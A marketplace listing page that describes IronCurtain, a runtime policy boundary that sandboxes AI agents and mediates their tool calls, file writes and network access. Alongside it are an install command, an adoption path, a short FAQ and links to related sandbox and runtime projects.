Esta página se muestra en inglés. Una traducción al español está en curso.
SkillsMay 12, 2026·2 min de lectura

IronCurtain — Secure Runtime for AI Agents

IronCurtain is a runtime boundary for agents: it treats the model as untrusted and enforces policy for tool calls, writes, and network effects.

Script Depot
Script Depot · Community
Listo para agents

Este activo puede ser leído e instalado directamente por agents

TokRepo expone un comando CLI universal, contrato de instalación, metadata JSON, plan según adaptador y contenido raw para que los agents evalúen compatibilidad, riesgo y próximos pasos.

Native · 98/100Política: permitir
Superficie agent
Cualquier agent MCP/CLI
Tipo
Skill
Instalación
Single
Confianza
Confianza: Established
Entrada
Asset
Comando CLI universal
npx tokrepo install ac61bb7c-183a-4eee-b56a-03b97b61992d
contrato de instalaciónJSON de metadataplan adaptadorcontenido raw
Introducción

IronCurtain is a runtime boundary for agents: it treats the model as untrusted and enforces policy for tool calls, writes, and network effects.

  • Best for: teams running autonomous agents who need enforced guardrails beyond prompt-level instructions
  • Works with: Node.js 22+, Docker (recommended), LLM provider API keys (Anthropic/Google/OpenAI)
  • Setup time: 18 minutes

Practical Notes

  • Enforces policy at the boundary (not by trusting the model to follow instructions)
  • Supports both a Docker-mediated mux mode and a builtin sandboxed mode (per README)
  • GitHub stars/forks (verified): see Source & Thanks

When an agent is autonomous, the biggest failure mode isn’t “bad answer” — it’s uncontrolled side effects.

IronCurtain’s framing is useful even if you don’t adopt it fully:

  • Assume the model is untrusted.
  • Put enforcement outside the model (policy engine + controlled tool boundary).
  • Make risky operations explicit and reviewable (writes, pushes, network calls).

A pragmatic adoption path:

  1. Use the built-in agent mode first for small tasks.
  2. Move to Docker-mediated mux mode when you want stronger isolation.
  3. Treat policies as code: version them, review them, and keep a default-deny posture for mutations.

FAQ

Q: Is it a model or a wrapper? A: It’s a runtime/policy boundary that runs an agent and mediates tool calls.

Q: Do I need Docker? A: Docker is strongly recommended for the strongest isolation, but some modes run without it.

Q: What should I lock down first? A: Network access and write operations: make them explicit and require approval/escalation.

🙏

Fuente y agradecimientos

Source: https://github.com/provos/ironcurtain > License: Apache-2.0 > GitHub stars: 399 · forks: 52

Discusión

Inicia sesión para unirte a la discusión.
Aún no hay comentarios. Sé el primero en compartir tus ideas.

Activos relacionados

microsandbox — Secure Local Sandboxes for AI Agents

microsandbox provides lightweight, programmable sandboxes that let AI agents execute code safely on your own machine, with strong isolation and support for multiple runtimes.

Skills
Script Depot

Wasmtime — Fast Secure WebAssembly Runtime

Wasmtime is a standalone WebAssembly runtime by the Bytecode Alliance. It runs Wasm modules outside the browser with near-native speed, sandboxed security, and WASI support — enabling server-side Wasm for plugins, serverless functions, and edge computing.

Skills
AI Open Source

Kata Containers — Lightweight VMs for Secure Container Runtime

Run containers inside lightweight virtual machines that provide hardware-level isolation with near-native performance, combining the security of VMs with the speed of containers.

Skills
Script Depot

ONNX Runtime — Cross-Platform ML Model Inference Engine

ONNX Runtime is a high-performance inference engine for machine learning models in the ONNX format. Developed by Microsoft, it accelerates model serving across CPU, GPU, and specialized hardware with a unified API for Python, C++, C#, Java, and JavaScript.

Skills
Script Depot
Inicio🔍Buscar👤Yo